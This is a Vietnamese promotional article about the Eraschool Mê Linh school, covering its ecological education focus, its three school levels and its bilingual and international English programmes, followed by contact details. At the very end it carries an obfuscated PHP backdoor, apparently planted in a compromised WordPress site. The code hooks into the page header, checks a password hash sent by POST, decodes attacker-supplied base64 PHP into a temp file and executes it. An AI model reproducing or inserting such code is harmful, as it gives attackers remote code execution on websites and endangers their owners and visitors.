Trường liên cấp Eraschool Mê Linh: mô hình trường sinh thái chất lượng cao

post

Dù mới thành lập không lâu nhưng trường liên cấp Eraschool Mê Linh được xem là trường chất lượng cao trong khu vực. Vậy ngôi trường này có gì mà thu hút được sự chú ý trong thời gian ngắn? Chất lượng giáo dục của trường như thế nào? Trường có những cấp học nào? Mời quý phụ huynh tham khảo bài viết dưới đây:

Vài nét về trường học sinh thái Eraschool

Khuôn viên của Eraschool rộng hơn 20.000m2
Khuôn viên của Eraschool rộng hơn 20.000m2

Ngay từ khi thành lập, Eraschool đã chọn sinh thái là một trong những trụ cột giáo dục chính của mình. Các hoạt động giáo dục sinh thái được triển khai xuyên suốt mọi hoạt động học tập ở trường, đan xen vào các môn học giúp trẻ hình thành nếp sống xanh, có tinh thần trách nhiệm với môi trường sống. Bên cạnh đó, khi theo học ở trường học sinh thái Eraschool, trẻ được khuyến khích tham gia vào các hoạt động bảo vệ môi trường, được thực hành các hoạt động bảo vệ môi trường từ nhà trường tới gia đình và xã hội. 

Các cấp học hiện có ở Eraschool

Trường liên cấp Eraschool Mê Linh hiện đang có 3 cấp học, bao gồm: Tiền tiểu học, Tiểu học và Trung học cơ sở. Khi trẻ theo học tại trường, phụ huynh và các con không phải lo lắng về việc tìm trường chuyển cấp bởi luôn được học trong môi trường học tập đồng nhất và an toàn.

Tiền tiểu học

Lớp tiền tiểu học đang quan sát mầm cây
Lớp tiền tiểu học đang quan sát mầm cây

Lớp tiền tiểu học của Eraschool dành cho các bạn 5 tuổi, chuẩn bị vào lớp 1. So với mô hình lớp lớn tại các trường mầm non, khi theo học lớp tiền tiểu học của Eraschool, các con sẽ có cơ hội được trải nghiệm nhiều hơn. Nhất là được học tập nếp sinh hoạt của lớp 1; được học cách sống và gần gũi với thiên nhiên; được học các kỹ năng cơ bản để tự phục vụ bản thân; được học cách hòa nhập và giải quyết các mâu thuẫn trong cộng đồng.

Tiểu học

Các bạn lớp 1 đang trong giờ học pha chế
Các bạn lớp 1 đang trong giờ học pha chế

Với cấp tiểu học, Eraschool tập trung vào giúp các con tìm ra niềm vui trong học tập và biết cách tự học. Tự học chính là con đường ngắn nhất giúp trẻ độc lập, trưởng thành và hạnh phúc. Bên cạnh đó, đây cũng chính là thời gian giúp các con học và hoàn thiện các kỹ năng sinh tồn để vào đời một cách tự tin và tự chủ.

Trung học cơ sở

Các bạn lớp 6 đang tự chuẩn bị bữa BBQ
Các bạn lớp 6 đang tự chuẩn bị bữa BBQ

Với cấp trung học cơ sở của trường liên cấp Eraschool Mê Linh, trẻ sẽ được tiếp tục học và hoàn thiện khả năng tự học. Trẻ có khả năng vận dụng các kỹ năng tự học vào việc tìm kiếm những tri thức mới. Tự học, tự tìm kiếm những tri thức và áp dụng những tri thức vào cuộc sống sẽ giúp trẻ có thêm tự tin để bước vào đời.

Chương trình học chất lượng của trường

Hiện nay Eraschool đang có 2 chương trình học tập, đó là hệ song ngữ và hệ quốc tế. Cả 2 chương trình học này đều tập trung phát triển khả năng sử dụng tiếng Anh của trẻ, giúp trẻ tự tin khi giao tiếp bằng tiếng Anh để phục vụ cho các cấp học cao hơn.

Hệ song ngữ

Vì có hệ song ngữ nên ngoài tên gọi là trường liên cấp sinh thái, Eraschool còn được gọi là trường song ngữ. Chương trình học tập của hệ song ngữ là sự kết hợp của chương trình giáo dục phổ thông Quốc gia có đổi mới về phương pháp giảng dạy kết hợp với bổ trợ tiếng anh chuẩn Cambridge. Với thời lượng 10 tiết tiếng Anh/tuần, trẻ có thể sử dụng tiếng Anh như ngôn ngữ thứ 2 sau khi kết thúc bậc học.

Hệ quốc tế

Cũng giống như nhiều trường liên cấp quốc tế khác, Eraschool cũng sử dụng chương trình giáo dục phổ thông Quốc gia có đổi mới về phương pháp giảng dạy và chương trình phổ thông quốc tế (Cambridge International School) để giảng dạy cho hệ quốc tế. Với thời lượng 16-18 tiết tiếng Anh/tuần, sau khi kết thúc bậc học, trẻ có khả năng tư duy bằng tiếng Anh, sử dụng tiếng Anh thành thạo trong nhiều lĩnh vực khác nhau như ngôn ngữ, văn học, toán, khoa học,…

Với chương trình học tập trung vào phát triển khả năng sử dụng tiếng Anh, có thể xem trường liên cấp Eraschool Mê Linh là trường chất lượng cao ở khu vực Mê Linh và các khu vực lân cận. 

Hy vọng, những thông tin trong bài viết này đã giúp quý phụ huynh hiểu hơn về ngôi trường cũng như chương trình giáo dục đang sử dụng tại trường. Nếu phụ huynh có thêm thắc mắc khác, vui lòng gọi tới hotline 0899 889 818 để được tư vấn kịp thời. Eraschool luôn sẵn sàng đồng hành cùng con trên con đường tiếp nhận tri thức để vào đời!

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}